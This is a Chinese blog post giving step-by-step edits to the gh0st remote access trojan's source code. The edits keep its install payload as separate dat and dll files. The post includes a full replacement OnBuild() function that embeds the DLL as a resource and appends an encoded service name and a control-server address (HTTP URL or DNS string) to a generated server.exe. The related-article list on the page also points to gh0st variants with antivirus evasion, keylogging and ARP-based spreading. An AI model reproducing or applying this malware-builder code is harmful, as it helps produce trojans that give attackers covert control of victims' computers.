gh0st完全分离dat文件与dll文件

最新推荐文章于 2018-10-24 22:14:54 发布
最新推荐文章于 2018-10-24 22:14:54 发布
阅读量808 收藏
点赞数
分类专栏: 学习

1.

搜索IDR_DLL

搜索IDR_BSS

注释:

//IDR_BSS                 BSS     DISCARDABLE     "res\\install.exe"

//IDR_BSS                 BSS     DISCARDABLE     "res\\install.exe"


2.

搜索ReleaseResource

搜索第一行改成

BOOL ReleaseResource(HMODULE hModule, LPCTSTR wResourceID, LPCTSTR lpType, LPCTSTR lpFileName, LPCTSTR lpConfigString)

第二处

代码改成

ReleaseResource(NULL, "DLL", "BIN", strModulePath, lpConfigString);


在搜索hResInfo = FindResource

一处,改成

hResInfo = FindResource(hModule, wResourceID, lpType);


3.在工程文件右键-设置-连接

install files

svchost files

../../bin/sx.dat

../../bin/data.dll


4.打开gh0st files源文件里的BuildView.cpp

找到void CBuildView::OnBuild() 

把下面的代码替换。注意代码里面的路径就OK了

void CBuildView::OnBuild() 

{

// TODO: Add your control notification handler code here

UpdateData(true);

if (m_ServiceDisplayName.IsEmpty() || m_ServiceDescription.IsEmpty())

{

AfxMessageBox("请完整填写服务显示名称和描述 -:(");

return;

}

CString strAddress;


// 保存配置

((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Build", "DisplayName", m_ServiceDisplayName);

((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Build", "Description", m_ServiceDescription);

((CGh0stApp *)AfxGetApp())->m_IniFile.SetInt("Build", "enablehttp", m_enable_http);

if (m_enable_http)

{

CString str;

GetDlgItemText(IDC_URL, str);

((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Build", "httpurl", str);

str.MakeLower();

strAddress = MyEncode(str.GetBuffer(0));

}

else

{

GetDlgItemText(IDC_DNS_STRING, strAddress);

if (strAddress.Find("AAAA") == -1)

{

AfxMessageBox("域名上线字串格式出错 -:(");

return;

}

strAddress.Replace("AAAA", "");

}


CStringstrServiceConfig;

strServiceConfig.Format("%s|%s", MyEncode(m_ServiceDisplayName.GetBuffer(0)), 

MyEncode(m_ServiceDescription.GetBuffer(0)));


CFileDialog dlg(FALSE, "exe", "server.exe", OFN_OVERWRITEPROMPT,"可执行文件|*.exe", NULL);

if(dlg.DoModal () != IDOK)

return;

char Path[MAX_PATH];

char ExePath[MAX_PATH];

char DllPath[MAX_PATH];

char BakPath[MAX_PATH];

char Wrong[MAX_PATH];

char Wrong1[MAX_PATH];

GetModuleFileName(NULL, Path, sizeof(Path));   //获取程序自身完整路径名称,即Gh0st.exe的路径

PathRemoveFileSpec(Path);

wsprintf(ExePath,"%s%s",Path,"\\sx.dat");

wsprintf(DllPath,"%s%s",Path,"\\data.dll");

wsprintf(BakPath,"%s%s",Path,"\\bak.bak");

wsprintf(Wrong,"%s%s%s%s","\"",ExePath,"\""," 哥,文件都被你吃了!");

wsprintf(Wrong1,"%s%s%s%s","\"",DllPath,"\""," 哥,文件都被你吃了!");


if(!CopyFile(ExePath,BakPath,FALSE))  //如果不存在dat文件就提示下

{

MessageBox(Wrong,"提示");

return;

}


HANDLE hFile;

    hFile = CreateFile(DllPath, GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE)

    {

DeleteFile(BakPath);

       MessageBox(Wrong1,"提示");

return;

    }


DWORD nSizeOfSrcFile = GetFileSize( hFile, &nSizeOfSrcFile ); 

char *szSrcFileBuf = new char[ nSizeOfSrcFile ]; 

ReadFile( hFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL); 


HANDLE hUpdate;

BOOL ret;

hUpdate = BeginUpdateResource(BakPath, false);

    ret = UpdateResource(hUpdate, "BIN", "DLL", 0, szSrcFileBuf, nSizeOfSrcFile);

    if (!ret)

    {

CloseHandle(hFile);

    }

    CloseHandle(hFile);

EndUpdateResource( hUpdate, false ); 

delete []szSrcFileBuf; 

CloseHandle(hFile);

CopyFile(BakPath,dlg.GetPathName(),FALSE);

DeleteFile(BakPath);


CFile file;

if(file.Open (dlg.GetPathName(), CFile::modeWrite))

{

try

{

file.Seek(0,CFile::end);               //把文件指针指向文件末尾

// 写入6个'C',是服务的名称和描述

file.Write("CCCCCC", 6);

file.Write(strServiceConfig, strServiceConfig.GetLength() + 1);

// 写入6个'A',安装时查找

file.Write("AAAAAA", 6);

file.Write(strAddress, strAddress.GetLength() + 1);

file.Close();

char ShowText[200];

wsprintf(ShowText,"%s%s","服务端已生成到:",dlg.GetPathName());

MessageBox(ShowText,"提示",MB_ICONEXCLAMATION | MB_OK);

}

catch(...)

{

MessageBox("文件保存失败,请检查...","提示",MB_OK|MB_ICONSTOP);

}

}

}

00name
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gh0st源码学习(三)生成DLLDAT文件
liujiayu2的专栏
05-26 2290
从生成的EXE文件分离出DLL和DAT 文件 一、自定义DLL和DAT文件的生成路径  先搜索 IDR_BSS 、 IDR_DLL   1、 IDR_DLL   位置:\Gh0st3.6原版\Server\install\install.cpp(418):        ReleaseResource(NULL, IDR_DLL, "BIN", strModulePath,
vb6编写dll读取dat文件_VB6.0中文企业版 安装向导
weixin_39989688的博客
12-11 396
点击上方计算趣味与娱乐 关注我们VB6.0中文企业版VB6.0全称为VisualBasic6.0,是微软公司于1998年推出的可视化编程工具MSDN之一,是目前使用广泛的程序开发工具之一。结构简单,编写程序对系统的资源占有极低,是程序编写者编写小型程序的选择!如果你是一个对编程一无所知,而又迫切希望掌握一种快捷实用的编程语言的初学者,那选择VB6.0没错的。即使考虑到VB程序本身编译和...
DAT文件修改器
04-08
解加密客服端dat文件文本教程 首先把我们需要的客服端的dat文件复制出来 比如:weapongrp.dat 这个文件为例 把他们复制出去喔 现在来解压缩 首先用l2encdec_292进行解密 方法是先把weapongrp.dat放到l2encdec_292文件夹里面去 编辑解加密.bat 把l2encdec.exe -s weapongrp.dat 的weapongrp.dat改成你要解的dat文件名字 好的.现在来修改一下 保存.然后运行就可以了 现在得到dec-weapongrp.dat 把他们复制到l2asm-disasm_1093 文件夹里面去 现在进行dat转txt操作 直接运行就好了 好了.到这里解加密就完成了 会得到一个文本文档和ACD数据库数据文件,直接打开文本文档进行修改就可以了 另外说一下..官方和私服的dat文件有经过特殊加密.所以是没办法这样解的喔!! 好了 现在说下修改完毕后怎么还原 其实也很简单 直接运行txt转dat 就又得到dec-weapongrp.dat(前提是把原来的删掉) 再把dec-weapongrp.dat复制到l2encdec_292(前提是把原来的删掉) 直接运行 加密 就得到原来的weapongrp.dat(覆盖到客服端system里就好了) 现在整个过程就全部结束了 可以进游戏咯! 祝大家游戏愉快!!!!!!
远控程序化
02-24
远控程序化
Gh0st源代码详细剖析
liujiayu2的专栏
05-28 3969
声明: 首先声明,这篇文章完全是根据自己对gh0st源代码的理解写出来的,如果有理解上的偏差或者表述上的错误本人不负责,仅供参考! 前言: 在我刚学习gh0st源代码的时候,觉得这东西好难,三个工程放在一起不说,还有那么多文件,当时就懵了。这怎么看呢?从何下手呢?我想大部分刚学习gh0st源代码的同胞们都有和我一样的想法,我废话不多说了,下面就为大家详细讲解gh0st源代码。
gh0st-vs2017.zip_Gh0st_hist3n_muddqn_远程控制
07-14
gh0st-vs2017.zip_Gh0st_hist3n_muddqn_远程控制】这个压缩包文件涉及到的是一个名为"gh0st"的远程控制软件的版本,该版本是使用Visual Studio 2017(VS2017)进行编译开发的。在网络安全领域,"gh0st"是一种知名...
基于Gh0st3.8修改编译成功的远程控制源代码
11-17
综上所述,这个压缩包提供了Gh0st3.8远程控制软件的修改版源代码,涵盖了C#编程、远程控制技术、服务器与客户端通信等多个IT领域的知识。学习者可以通过分析这些源代码,深入了解网络通信、权限控制以及恶意软件的...
gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_
10-02
虽然没有提供具体的文件列表,但根据"gh0st3.6_src红狼官方_源码"的命名,我们可以推断压缩包内可能包含以下几类文件: 1. 源代码文件:如C++、C#或其他编程语言的源代码文件(.cpp、.c、.cs等)。 2. 构建脚本:...
Gh0St3.75完美稳定版服务端ARP
02-25
gh0st稳定版,支持win7、win8、64位屏幕、64位键盘监控、服务端自动内网ARP抓局域网其他电脑,网上很难找到比这个版本更好的了。 2015/11/2日上传。
[C++] gh0st RAT 3.6_rat_gh0st3.6_Gh0st_
10-03
5. **屏幕截取与键盘记录**:gh0st RAT 3.6可能包含这些功能,用于监视用户行为。这涉及到屏幕捕获API和键盘钩子技术。 6. **命令执行与脚本支持**:RAT可能允许攻击者通过命令行接口执行系统命令或运行脚本。这...
IOCP_dll 移植了Gh0st中的IOCP完成端口服务端
12-13
移植了开源远程控制软件 GH0ST3.6中的IOCP模型 封装为DLL的形式,分为客户端和服务端。 编译环境WIN7+VS2010
gh插件关于weaverbird
03-08
weaverbird的插件 是一个非常好用的grasshopper的插件 可以直接用来细分一个面 把一个面呈现出非常精彩的效果
Gh0st样本分析
qq_38184895的博客
10-24 499
Gh0st样本分析 ###一.样本信息 文件名称: DD668456CF2F3B72773D1968487BDCD5.exe 文件大小:110KB MD5: DD668456CF2F3B72773D1968487BDCD5 SHA-1: 4E6D34B68E219BE56D8A1C0DA5B7FB8ECCD282B9 ###二.样本分析 0x01. GetInputState()用于隐...
Gh0st通信协议解析
crkres9527
05-17 1380
Gh0st通信协议解析 ******************************************************************************* 从主控端初始化IOCP服务器开始讲起 [cpp]view plaincopyprint?   1        // 启动IOCP服务器  2        int nPort = m_IniFile.
远控软件gh0st源码免杀之我谈
qingruo_yin的专栏
08-05 5161
远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马免杀工作。     好久没有来博客了,我把免杀这部分整理了一下,先抛一砖头,有兴趣的朋友可以接着做,也可以和本人交流
gh0st alpha
最新发布
12-23
如果怀疑自己的设备被gh0st alpha感染,应该立即断开与互联网的连接,使用可靠的杀毒软件进行全面扫描和清理,并及时更改重要的密码。如果情况严重,建议立即联系专业的技术支持人员或网络安全专家进行处理。 总之...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值